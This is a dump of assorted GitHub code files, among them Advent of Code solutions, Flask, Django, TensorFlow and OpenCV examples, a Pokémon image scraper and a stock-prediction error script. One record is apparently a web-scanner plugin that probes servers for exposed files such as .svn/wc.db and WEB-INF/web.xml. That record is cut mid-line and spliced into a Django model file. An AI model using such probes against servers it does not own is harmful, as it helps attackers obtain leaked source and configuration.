rev\n\n\ndef part_one(rev):\n q = deque(['shiny gold'])\n seen = set()\n while q:\n cur = q.popleft()\n if cur not in seen:\n q += deque(rev[cur])\n seen.add(cur)\n return len(seen) - 1 # remove one for 'shiny gold'\n\n\ndef part_two(graph):\n def dfs(bag):\n return 1 + sum((v * dfs(k)) for k, v in graph[bag].items())\n return dfs('shiny gold') - 1 # remove one for 'shiny gold'\n\n\ngraph = parse_input(data)\nrev_graph = create_reverse_graph(graph)\n\nprint(f'Part 1: {part_one(rev_graph)}') # 372\nprint(f'Part 2: {part_two(graph)}') # 8015\n","repo_name":"michaeljgallagher/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"16962808584","text":"import os\nfrom re import template\nfrom flask import Flask\nfrom flask.helpers import url_for\nfrom flask.templating import render_template\nfrom flask_mail import Mail, Message\n\napp = Flask(__name__)\nmail = Mail(app)\n\napp.config['MAIL_SERVER'] = 'smtp.googlemail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = os.evniron.get('MAIL_USERNAME')\napp.config['MAIL_PASSWORD'] = os.environ.get(\"MAIL_PASSWORD\")\n\napp.config['FLASKY_MAIL_SUBJECT_PREFIX'] = ['Flasky']\napp.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin '\n\napp.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')\n\ndef send_mail(to,subject,template,**kwargs):\n msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])\n msg.body = render_template(template + '.txt', **kwargs)\n msg.html = render_template(template + '.html', **kwargs)\n mail.send(msg)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n form = NameForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.name.data).first()\n if user is None:\n user = User(username=form.name.data)\n db.session.add(user)\n session['know'] = False\n if app.config['FLASKY_ADMIN']:\n send_email(app.config['FLASKY_ADMIN'], 'New User', 'mail/new_user', user=user)\n else:\n session['know'] = True\n session['name'] = form.name.data\n form.name.data = ''\n return redirect(url_for('index'))\n return render_template('index.html', form=form, name=session.get('name'), know=session.get('know', False))","repo_name":"bbnopy/pryklady","sub_path":"Python_ALL/Flask/4flaskWebDevelopment2/part1/chapter6/listing6.1.Hello.FlaskMailConfiguration/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7875152065","text":"from sos.plugins import Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin\nimport glob\nimport os\n\n\nclass LibvirtClient(Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin):\n \"\"\"client for libvirt virtualization API\n \"\"\"\n\n plugin_name = 'virsh'\n profiles = ('system', 'virt')\n\n packages = ('libvirt-client',)\n\n def setup(self):\n # virt-manager logs\n if not self.get_option(\"all_logs\"):\n self.add_copy_spec(\"/root/.virt-manager/*\", sizelimit=5)\n else:\n self.add_copy_spec(\"/root/.virt-manager/*\")\n\n cmd = 'virsh -r'\n\n # get host information\n subcmds = [\n 'list --all',\n 'domcapabilities',\n 'capabilities',\n 'nodeinfo',\n 'freecell',\n 'node-memory-tune',\n 'version'\n ]\n\n for subcmd in subcmds:\n self.add_cmd_output('%s %s' % (cmd, subcmd))\n\n # get network, pool and nwfilter elements\n for k in ['net', 'nwfilter', 'pool']:\n self.add_cmd_output('%s %s-list' % (cmd, k))\n k_list = self.get_command_output('%s %s-list' % (cmd, k))\n if k_list and k_list['status'] == 0:\n k_lines = k_list['output'].splitlines()\n # the 'Name' column position changes between virsh cmds\n pos = k_lines[0].split().index('Name')\n for j in filter(lambda x: x, k_lines[2:]):\n n = j.split()[pos]\n self.add_cmd_output('%s %s-dumpxml %s' % (cmd, k, n))\n\n # cycle through the VMs/domains list, ignore 2 header lines and latest\n # empty line, and dumpxml domain name in 2nd column\n domains_output = self.get_command_output('%s list --all' % cmd)\n if domains_output and domains_output['status'] == 0:\n domains_lines = domains_output['output'].splitlines()[2:]\n for domain in filter(lambda x: x, domains_lines):\n d = domain.split()[1]\n for x in ['dumpxml', 'dominfo', 'domblklist']:\n self.add_cmd_output('%s %s %s' % (cmd, x, d))\n# vim: et ts=4 sw=4\n","repo_name":"wzzalx/wzz","sub_path":"python2.7/site-packages/sos/plugins/virsh.py","file_name":"virsh.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9000061739","text":"import cv2\n\nBCOLOR = (75, 0, 130)\nTHICKNESS = 4\n\nimg_color = cv2.imread(\"assets/ocbc.jpg\")\nimg_color = cv2.resize(img_color, None, None, fx=0.5, fy=0.5)\nimg = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)\n\nblurred = cv2.GaussianBlur(img, (7, 7), 0)\nblurred = cv2.bilateralFilter(blurred, 5, sigmaColor=50, sigmaSpace=50)\nedged = cv2.Canny(blurred, 130, 150, 255)\n\ncv2.imshow(\"Outline of device\", edged)\ncv2.waitKey(0)\n\ncnts, _ = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n# sort contours by area, and get the first 10\ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:9]\n\ncv2.drawContours(img_color, cnts, 0, BCOLOR, THICKNESS)\ncv2.imshow(\"Target Contour\", img_color)\ncv2.waitKey(0)\n\nfor i, cnt in enumerate(cnts):\n cv2.drawContours(img_color, cnts, i, BCOLOR, THICKNESS)\n print(f\"ContourArea:{cv2.contourArea(cnt)}\")\n cv2.imshow(\"Contour one by one\", img_color)\n cv2.waitKey(0)\n","repo_name":"onlyphantom/cvessentials","sub_path":"digitrecognition/contourarea_01.py","file_name":"contourarea_01.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"85"} +{"seq_id":"6896379350","text":"#working on interview questions\n\n#find missing number in an int array of 1 to 100\ndef missingInt(a):\n\tif a[0] != 100:\n\t\treturn 100\n\tif a[1] != a[0] + 1:\n\t\treturn a[0] + 1\n\telse:\n\t\treturn missingInt(a[1:])\ndef main():\n\tlst = [i for i in range(101)]\n\tlst.remove(100)\n\tprint(missingInt(lst))\nmain()","repo_name":"richard-paredes/CS-Fundamentals","sub_path":"Algorithms/Notes/programming.py","file_name":"programming.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32305073105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @author: 'orleven'\n\nfrom script import Script, SERVICE_PORT_MAP\n\n_file_dic = {\n \"crossdomain.xml\": 'allow-access-from domain=\"*\"',\n \".svn/entries\": 'dir',\n \".svn/wc.db\": 'sqlite format',\n \"WEB-INF/web.xml\": \"str:\n return f'Request :{self.req_user1} - {self.req_user2}'\n\n\n@receiver([signals.post_save],sender=FriendRequest)\ndef notify_group(sender, instance, **kwargs):\n from accounts.models import CustomUser\n\n room_name_postfix = instance.receiver.username\n group_name = \"friend_request_\"+room_name_postfix\n consumer_method_type = 'friend_request_operations'\n if not kwargs['created']:\n data = {}\n friend_requests = FriendRequest.objects.filter(receiver=instance.receiver, is_pending = True)\n sender_ids = friend_requests.values('sender_id')\n print(sender_ids)\n sender_qs = CustomUser.objects.filter(id__in = sender_ids).order_by('request_sender')\n print(\"khai yesle kaam garekai chaina jasto cha\")\n data['sender'] = list(sender_qs.values(\n 'username',\n 'first_name',\n 'last_name',\n 'id',\n 'profile_image',\n ))\n \n data['friend_requests'] = list(friend_requests.values('id','receiver','sender'))\n perform_broadcast(data,group_name,consumer_method_type)\n pass\n elif kwargs['created']:\n data = {}\n friend_requests = FriendRequest.objects.filter(receiver=instance.receiver, is_pending = True)\n sender_ids = friend_requests.values('sender_id')\n sender_qs = CustomUser.objects.filter(id__in = sender_ids)\n data['sender'] = list(sender_qs.values(\n 'username',\n 'first_name',\n 'last_name',\n 'id',\n 'profile_image',\n ))\n data['friend_requests'] = list(friend_requests.values('id','receiver','sender'))\n print(\"yo chai new create vako\")\n perform_broadcast(data,group_name,consumer_method_type)\n\n\n\n","repo_name":"bpdyl/chat-application-dh","sub_path":"ChatApp/friends/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73985661716","text":"\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport process_image\n\n\ntrain_image, train_label, test_image, test_label=process_image.read_data()\n\n\nmax_epochs=12000\nLR=1e-5\nbatch_size=125\ndisplay_step=100\n\nimage_size = 64 \nn_classes = 2\ndropout = 0.75\n\nx = tf.placeholder(tf.float32, [None, image_size,image_size,1])\ny = tf.placeholder(tf.float32, [None, n_classes])\n\nkeep_prob = tf.placeholder(tf.float32)\n\ndef conv2d(img, w, b):\n\treturn tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(img, w,strides=[1, 1, 1, 1],padding='SAME'),b))\n\ndef max_pool(img, k):\n\treturn tf.nn.max_pool(img, ksize=[1, k, k, 1],strides=[1, k, k, 1],padding='SAME')\n\nwc1 = tf.Variable(tf.random_normal([5, 5, 1, 32]))\nbc1 = tf.Variable(tf.random_normal([32]))\n\nwc2 = tf.Variable(tf.random_normal([5, 5, 32, 64]))\nbc2 = tf.Variable(tf.random_normal([64]))\n\nwc3 = tf.Variable(tf.random_normal([5, 5, 64, 128]))\nbc3 = tf.Variable(tf.random_normal([128]))\n\nwc4 = tf.Variable(tf.random_normal([5, 5, 128, 256]))\nbc4 = tf.Variable(tf.random_normal([256]))\n\nwc5 = tf.Variable(tf.random_normal([5, 5, 256, 512]))\nbc5 = tf.Variable(tf.random_normal([512]))\n\n\n\nwd1 = tf.Variable(tf.random_normal([(image_size//32)*(image_size//32)*512, 1024]))\n\nwout = tf.Variable(tf.random_normal([1024, n_classes]))\nbd1 = tf.Variable(tf.random_normal([1024]))\n\ntf.summary.histogram('wc1',wc1)\ntf.summary.histogram('bc1',bc1)\ntf.summary.histogram('wc2',wc2)\ntf.summary.histogram('bc2',bc2)\ntf.summary.histogram('wc3',wc3)\ntf.summary.histogram('bc3',bc3)\ntf.summary.histogram('wc4',wc4)\ntf.summary.histogram('bc4',bc4)\ntf.summary.histogram('wc5',wc5)\ntf.summary.histogram('bc5',bc5)\ntf.summary.histogram('wd1',wd1)\ntf.summary.histogram('wout',wout)\ntf.summary.histogram('bd1',bd1)\n\n\n\nbout = tf.Variable(tf.random_normal([n_classes]))\n\nconv1 = conv2d(x,wc1,bc1)\n\nconv1 = max_pool(conv1, k=2)\n\nconv2 = conv2d(conv1,wc2,bc2)\n\nconv2 = max_pool(conv2, k=2)\n\nconv3 = conv2d(conv2,wc3,bc3)\n\nconv3 = max_pool(conv3, k=2)\n\nconv4 = conv2d(conv3,wc4,bc4)\n\nconv4 = max_pool(conv4, k=2)\n\nconv5 = conv2d(conv4,wc5,bc5)\n\nconv5 = max_pool(conv5, k=2)\n\n\ndense1 = tf.reshape(conv5, [-1,wd1.get_shape().as_list()[0]])\n\ndense1 = tf.nn.relu(tf.add(tf.matmul(dense1, wd1),bd1))\n\ndense1 = tf.nn.dropout(dense1, keep_prob)\n\npred = tf.add(tf.matmul(dense1, wout), bout)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\ntf.summary.scalar(\"Loss\",cost)\noptimizer =tf.train.RMSPropOptimizer(learning_rate=LR).minimize(cost)\n\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\ntf.summary.scalar(\"accuracy\",accuracy)\n\ninit_op= tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init_op)\n summary=tf.summary.merge_all()\n file_write=tf.summary.FileWriter(\"output\",sess.graph)\n\n\n for epochs in range(max_epochs):\n index=np.random.choice(train_image.shape[0],size=batch_size)\n batch_image=train_image[index]\n batch_label=train_label[index]\n sess.run([optimizer],feed_dict={x:batch_image,y:batch_label,keep_prob:dropout})\n\n\n if epochs % display_step==0:\n train_loss,summary1=sess.run([cost,summary],feed_dict={x:batch_image,y:batch_label,keep_prob:dropout})\n test_accuarcy,summary2=sess.run([accuracy,summary],feed_dict={x:test_image,y:test_label,keep_prob:1.0})\n file_write.add_summary(summary1,global_step=epochs)\n file_write.add_summary(summary2,global_step=epochs)\n print(\"Training Loss: {} Test Accuarcy: {}\".format(train_loss,test_accuarcy))\n \n\n\n\n print(\"Finish Training......\")","repo_name":"HarryChen1995/Cat_VS_Dog","sub_path":"cat_dog_CNN.py","file_name":"cat_dog_CNN.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6183053392","text":"# https://www.hackerrank.com/challenges/breaking-best-and-worst-records/problem\n\ndef breakingRecords(scores):\n # 처음엔 min=socre[0], max=score[0]\n # 이후 각 점수가 max보다 큰지 min보다 작은지 체크\n # 해당하면 그 값을 교체\n # 교체할 때마다 각 count +1 \n minScore = maxScore = scores[0]\n minCount = maxCount = 0\n for score in scores:\n if score < minScore:\n minScore = score\n minCount += 1\n elif score > maxScore:\n maxScore = score\n maxCount += 1\n return [maxCount, minCount]\n\nif __name__ == \"__main__\":\n scoreNum = input()\n scores = list(map(int,input().split()))\n result = ' '.join(map(str, breakingRecords(scores)))\n print(result)","repo_name":"2kindsofcs/exercise","sub_path":"python exercise/breaking-the-records.py","file_name":"breaking-the-records.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9226444070","text":"import os \nimport json\nimport pafy\nimport json\nimport time\nimport wave\nimport ffmpy\nimport pandas as pd\nimport soundfile as sf\nimport shutil \n\nfilename=input('what is the file name? \\n')\ndesktop=\"/Users/jim/Desktop/\"\nos.chdir(desktop)\nfoldername=filename[0:-5]\ndestfolder=desktop+foldername+'/'\ntry:\n os.mkdir(foldername)\n os.chdir(destfolder)\nexcept:\n os.chdir(destfolder)\n\n#move file to destfolder \nshutil.move(desktop+filename,destfolder+filename)\n\n#load xls sheet\nloadfile=pd.read_excel(filename)\nlink=loadfile.iloc[:,0]\nlength=loadfile.iloc[:,1]\ntimes=loadfile.iloc[:,2]\nlabel=loadfile.iloc[:,3]\n\n#initialize lists \nlinks=list()\nlengths=list()\nstart_times=list()\nend_times=list()\nlabels=list()\n\n#only make links that are in youtube processable \nfor i in range(len(link)):\n if str(link[i]).find('youtube.com/watch') != -1:\n links.append(str(link[i]))\n lengths.append(str(length[i]))\n #find the dash for start/stop times\n time=str(times[i])\n index=time.find('-')\n start_time=time[0:index]\n #get start time in seconds \n start_minutes=int(start_time[0])\n start_seconds=int(start_time[-2:])\n start_total=start_minutes*60+start_seconds\n #get end time in seconds \n end_time=time[index+1:]\n end_minutes=int(end_time[0])\n end_seconds=int(end_time[-2:])\n end_total=end_minutes*60+end_seconds\n #update lists \n start_times.append(start_total)\n end_times.append(end_total)\n #labels\n labels.append(str(label[i]))\n\nfiles=list()\nfor i in range(len(links)):\n try: \n video=pafy.new(links[i])\n bestaudio=video.getbestaudio()\n filename=bestaudio.download()\n start=start_times[i]\n end=end_times[i]\n extension=bestaudio.extension\n #get file extension and convert to .wav for processing later \n os.rename(filename,'%s_start_%s_end_%s%s'%(str(i),start,end,extension))\n filename='%s_start_%s_end_%s%s'%(str(i),start,end,extension)\n if extension not in ['.wav']:\n xindex=filename.find(extension)\n filename=filename[0:xindex]\n ff=ffmpy.FFmpeg(\n inputs={filename+extension:None},\n outputs={filename+'.wav':None}\n )\n ff.run()\n os.remove(filename+extension)\n \n file=filename+'.wav'\n data,samplerate=sf.read(file)\n totalframes=len(data)\n totalseconds=totalframes/samplerate\n startsec=int(start_times[i])\n startframe=samplerate*startsec\n endsec=int(end_times[i])\n endframe=samplerate*endsec\n sf.write('snipped'+file, data[startframe:endframe], samplerate)\n os.remove(file)\n\n #can write json too \n \n \n except:\n print('no urls')\n\n\n","repo_name":"jim-schwoebel/allie","sub_path":"annotation/helpers/helpers/yscrape.py","file_name":"yscrape.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"85"} +{"seq_id":"35351775178","text":"'''\nAdapted from\nhttps://github.com/hshustc/CVPR19_Incremental_Learning/blob/master/cifar100-class-incremental/modified_linear.py\n\nReference:\n[1] Saihui Hou, Xinyu Pan, Chen Change Loy, Zilei Wang, Dahua Lin\n Learning a Unified Classifier Incrementally via Rebalancing. CVPR 2019\n'''\n\nimport math\nimport torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom typing import Union\n\n\nclass CosineLinear(Module):\n def __init__(self, in_features, out_features, sigma: Union[bool, float, int] = True):\n super(CosineLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.empty(out_features, in_features), requires_grad=True)\n if isinstance(sigma, bool):\n if sigma:\n self.sigma = Parameter(torch.empty(1), requires_grad=True)\n self.sigma.data.fill_(1)\n else:\n self.register_parameter('sigma', None)\n elif isinstance(sigma, int) or isinstance(sigma, float):\n self.register_buffer('sigma', torch.tensor(float(sigma)))\n else:\n raise ValueError(\"sigma should be a boolean or a float\")\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input_: torch.Tensor):\n out = F.linear(F.normalize(input_, p=2,dim=1), F.normalize(self.weight, p=2, dim=1))\n if self.sigma is not None:\n out = self.sigma * out\n return out\n\n\nclass SplitCosineLinear(Module):\n #consists of two fc layers and concatenate their outputs\n def __init__(self, in_features, out_features1, out_features2, sigma: Union[bool, float, int] = True):\n super(SplitCosineLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features1 + out_features2\n self.fc1 = CosineLinear(in_features, out_features1, False)\n self.fc2 = CosineLinear(in_features, out_features2, False)\n if isinstance(sigma, bool):\n if sigma:\n self.sigma = Parameter(torch.empty(1), requires_grad=True)\n self.sigma.data.fill_(1)\n else:\n self.register_parameter('sigma', None)\n elif isinstance(sigma, int) or isinstance(sigma, float):\n self.register_buffer('sigma', torch.tensor(float(sigma)))\n else:\n raise ValueError(\"sigma should be a boolean or a float\")\n\n def forward(self, x):\n out1 = self.fc1(x)\n out2 = self.fc2(x)\n out = torch.cat((out1, out2), dim=1) # concatenate along the channel\n if self.sigma is not None:\n out = self.sigma * out\n return out\n","repo_name":"chandar-lab/IIRC","sub_path":"lifelong_methods/models/cosine_linear.py","file_name":"cosine_linear.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"85"} +{"seq_id":"43821328859","text":"from selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nimport sys\r\nimport os\r\n\r\nimport requests # request img from web\r\nimport shutil # save img locally\r\n\r\nfrom PIL import Image\r\nfrom PIL import ImageOps\r\n\r\ndef resize_img(filename):\r\n img = Image.open(filename).convert('RGBA')\r\n new_image = Image.new(\"RGBA\", img.size, \"WHITE\")\r\n new_image.paste(img, (0, 0), img)\r\n img = ImageOps.pad(new_image, (300,300), centering=(0.5,0.5), color=(255, 255, 255))\r\n\r\n os.remove(filename)\r\n filename = filename.rsplit('.', 1)[0] + '.jpg'\r\n img.convert('RGB').save(filename)\r\n\r\ndef save_img(curr_pokemon, curr_pokemon_img):\r\n img_url = curr_pokemon.find_element(By.TAG_NAME, \"img\").get_attribute(\"src\")\r\n curr_pokemon_img = f\"{curr_pokemon_img}.{img_url.rsplit('.', 1)[-1]}\"\r\n res = requests.get(img_url, stream = True)\r\n\r\n if res.status_code == 200:\r\n with open(curr_pokemon_img,'wb') as f:\r\n shutil.copyfileobj(res.raw, f)\r\n else:\r\n print('Image Couldn\\'t be retrieved')\r\n\r\n resize_img(curr_pokemon_img)\r\n\r\ndef main():\r\n os.system('cls')\r\n\r\n global exec_path\r\n\r\n exec_path = sys.argv[0]\r\n exec_path = exec_path.replace(\"\\\\\", \"/\")\r\n\r\n i_last_slash = exec_path[::-1].find(\"/\")\r\n\r\n exec_path = exec_path[: -i_last_slash]\r\n\r\n print(f\"Path: {exec_path}\")\r\n\r\n chrome_service = Service(f\"{exec_path}/chromedriver.exe\")\r\n chromium_options = webdriver.ChromeOptions()\r\n\r\n try:\r\n driver = webdriver.Chrome(service=chrome_service, options=chromium_options)\r\n except:\r\n print(\"Chrome Driver not in same directory, place it correctly!\")\r\n exit()\r\n \r\n driver.maximize_window()\r\n driver.get('https://pokemondb.net/pokedex/national')\r\n\r\n pokemon_img_path = f\"{exec_path}images/\"\r\n\r\n if not os.path.exists(pokemon_img_path):\r\n os.mkdir(pokemon_img_path)\r\n\r\n print(\"Waiting for the page\")\r\n time.sleep(2)\r\n\r\n gen_infocards = driver.find_elements(By.CLASS_NAME, \"infocard-list\")\r\n\r\n for gen_num, gen_elem in enumerate(gen_infocards):\r\n print(f\"Retrieving pokemon images of gen {gen_num+1}\")\r\n\r\n pokemon_elems = gen_elem.find_elements(By.CLASS_NAME, \"infocard\")\r\n\r\n for curr_pokemon in pokemon_elems:\r\n pokemon_name = curr_pokemon.find_element(By.CLASS_NAME, \"ent-name\").text.replace(\":\", \"\")\r\n print(f\"Current pokemon is {pokemon_name}\")\r\n\r\n curr_pokemon_path = f\"{pokemon_img_path}{pokemon_name}/\"\r\n\r\n info_url = curr_pokemon.find_element(By.TAG_NAME, \"a\").get_attribute(\"href\")\r\n\r\n # Open new tab\r\n driver.switch_to.new_window()\r\n\r\n driver.get(f\"https://pokemondb.net/{info_url}\")\r\n\r\n\r\n multiple_variants = driver.find_elements(By.CSS_SELECTOR, \".tabset-basics > .sv-tabs-tab-list > a\")\r\n multiple_variants_names = [elem.text for elem in multiple_variants]\r\n\r\n #if (multiple_variants):\r\n # variant_elems = multiple_variants.find_elements(By.TAG_NAME, \"a\")\r\n\r\n\r\n driver.get(f\"https://pokemondb.net/{info_url.replace('pokedex', 'artwork')}\")\r\n\r\n artwork_list = driver.find_elements(By.CLASS_NAME, \"grid-col\")\r\n\r\n if (not artwork_list):\r\n driver.get(f\"https://pokemondb.net/{info_url.replace('artwork', 'pokedex')}\")\r\n\r\n if (len(multiple_variants) == 1):\r\n if not os.path.exists(curr_pokemon_path):\r\n os.mkdir(curr_pokemon_path)\r\n\r\n curr_pokemon = driver.find_element(By.CLASS_NAME, \"grid-col\")\r\n curr_pokemon_img = f\"{curr_pokemon_path}0\"\r\n save_img(curr_pokemon, curr_pokemon_img)\r\n else:\r\n for variant in multiple_variants:\r\n variant_name = variant.text\r\n\r\n curr_variant_path = f\"{pokemon_img_path}{variant_name}/\"\r\n \r\n if not os.path.exists(curr_variant_path):\r\n os.mkdir(curr_variant_path)\r\n \r\n variant.click()\r\n\r\n time.sleep(1)\r\n\r\n curr_pokemon = driver.find_element(By.CLASS_NAME, \"grid-col\")\r\n \r\n curr_pokemon_img = f\"{curr_variant_path}0\"\r\n save_img(curr_pokemon, curr_pokemon_img)\r\n\r\n else:\r\n if (len(multiple_variants) == 1):\r\n if not os.path.exists(curr_pokemon_path):\r\n os.mkdir(curr_pokemon_path)\r\n for num, curr_artwork in enumerate(artwork_list):\r\n curr_pokemon_img = f\"{curr_pokemon_path}{num}\"\r\n save_img(curr_artwork, curr_pokemon_img)\r\n else:\r\n num_img = [[name, 0] for name in multiple_variants_names]\r\n num_img.reverse()\r\n for curr_artwork in artwork_list:\r\n variant_text = curr_artwork.find_element(By.CLASS_NAME, \"text-muted\").text\r\n\r\n for curr_num in num_img:\r\n curr_variant = curr_num[0]\r\n if (curr_variant in variant_text):\r\n curr_variant_path = f\"{pokemon_img_path}{curr_variant}/\"\r\n\r\n if not os.path.exists(curr_variant_path):\r\n os.mkdir(curr_variant_path)\r\n\r\n curr_pokemon_img = f\"{curr_variant_path}{curr_num[1]}\"\r\n save_img(curr_artwork, curr_pokemon_img)\r\n\r\n curr_num[1] += 1\r\n\r\n break\r\n \r\n\r\n\r\n\r\n driver.close()\r\n driver.switch_to.window(driver.window_handles[0])\r\n\r\n\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"abprous/Clasificador-Tipos-Pokemon","sub_path":"fetchPokemonImages.py","file_name":"fetchPokemonImages.py","file_ext":"py","file_size_in_byte":6058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38846574664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 29 14:39:30 2018\n\n@author: Andy\n\"\"\"\n\n#Sample execution python run_job.py ./input/window.txt ./input/actual.txt ./input/predicted.txt ./output/comparison.txt\n\n#sys library for inputting files as arguments \nimport sys\n\n#import os \n#dir_path='/Users/zza847/Downloads/prediction-validation-master/insight_testsuite'\n#dir_path = os.path.dirname(os.path.realpath(__file__))\n#print('current working directory is: '+ dir_path)\n\n#Function to check and read in each input file.\ndef readFile(direc):\n with open(direc,'r') as f_in:\n lines = list(line for line in (l.strip() for l in f_in) if line)\n if len(lines) == 0:\n print('ERROR: The input file :'+direc+' is empty')\n else:\n return(lines)\n \n\n#input files \n#actual_file=dir_path+'/tests/test_1/input/actual.txt'\n#predicted_file=dir_path+'/tests/test_1/input/predicted.txt'\n#window_file=dir_path+'/tests/test_1/input/window.txt'\n\n#Input file arguments into script\nwindow_file = sys.argv[1]\nactual_file = sys.argv[2]\npredicted_file = sys.argv[3]\noutput_file = sys.argv[4]\n\n#read in first line of file and use as window size\nwindow=readFile(window_file)[0]\nwindow=int(window) if window.isdigit() else print('need to input a number in the window.txt')\n\n#read in predicted/actual files\nactual=readFile(actual_file)\npredicted=readFile(predicted_file)\n\n#define the actual dic and predict_dict, the key is the tiime and stock name, the value is the value\nactual_dict={i.rsplit('|', 1)[0]:float(i.rsplit('|', 1)[1]) for i in actual }\npredicted_dict={i.rsplit('|', 1)[0]:float(i.rsplit('|', 1)[1]) for i in predicted } \n\n#define the error dict, key are the intesect of actual and predict\nintersect_keys=list(set(actual_dict.keys())& set(predicted_dict.keys()))\nerror_dict={key:abs(actual_dict[key]-predicted_dict[key]) for key in intersect_keys}\n\n#define the largest number for the slide window\ntime_list=[int(i.split('|')[0]) for i in intersect_keys]\nmax_num=max(time_list)\n\n#find the stock from the intesect \nstock_names=list(set([i.split('|')[1] for i in intersect_keys]))\n\n#calculate the error\ni=1\nprint('max time is larger than sliding window? passed') if max_num-i+1 >=window else print('the time collected is less than window')\nwith open (output_file,'w') as fout:\n while max_num-i+1 >= window:\n seq_number=list(range(i,i+window))\n numbers=[error_dict['|'.join([str(time),name])] for name in stock_names for time in seq_number if '|'.join([str(time),name]) in error_dict]\n if len(numbers) ==0:\n fout.write(str(seq_number[0])+'|'+str(seq_number[-1])+'|NA\\n')\n else:\n mean=sum(numbers) / float(len(numbers))\n Rounded_Mean= '{:.2f}'.format(round(mean, 2))\n fout.write(str(seq_number[0])+'|'+str(seq_number[-1])+'|'+str(Rounded_Mean)+'\\n')\n i=i+1\n \n \n\n\n","repo_name":"ahvo/Insight_Stock_Error_Challenge","sub_path":"insight_testsuite/temp/src/prediction-validation.py","file_name":"prediction-validation.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23747564243","text":"from pathlib import Path\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\n\nfrom hifi_gan_bwe import metrics\n\n\ndef test_summary(tmpdir: Path) -> None:\n summary = metrics.Summary(\n project=\"hifi-gan-bwe\",\n name=\"bwe-01\",\n log_path=str(tmpdir / \"logs\"),\n scalars=[metrics.Ema(\"gen_loss\"), metrics.Mean(\"gen_fit\")],\n use_wandb=False,\n )\n\n # scalars\n assert summary.scalars == dict(gen_loss=np.nan, gen_fit=np.nan)\n\n summary.update(gen_loss=0.5, gen_fit=1.0)\n assert summary.scalars == dict(gen_loss=0.5, gen_fit=1.0)\n\n summary.save(iterations=1000)\n assert summary.scalars == dict(gen_loss=np.nan, gen_fit=np.nan)\n\n # figure\n fig, ax = plt.subplots(1, 1)\n ax.plot(np.zeros([10]))\n summary.figure(iterations=1000, figure=fig, name=\"figure\")\n\n # audio\n audio = np.zeros([8000])\n summary.audio(iterations=1000, audio=audio, sample_rate=8000, name=\"audio\")\n\n\ndef test_mean() -> None:\n metric = metrics.Mean(\"test\")\n assert metric.value is np.nan\n assert metric.count == 0\n\n values = np.arange(5)\n for x in values:\n metric.update(x)\n assert metric.value == values.mean()\n assert metric.count == len(values)\n\n metric.reset()\n assert metric.value is np.nan\n assert metric.count == 0\n\n\ndef test_ema() -> None:\n alpha = 0.9\n metric = metrics.Ema(\"test\", alpha=alpha)\n assert metric.value is np.nan\n\n values = np.arange(5)\n ema = np.nan\n for x in values:\n metric.update(x)\n ema = x if ema is np.nan else ema * alpha + x * (1 - alpha)\n assert np.allclose(metric.value, ema)\n\n metric.reset()\n assert metric.value is np.nan\n\n\ndef test_grad_norm() -> 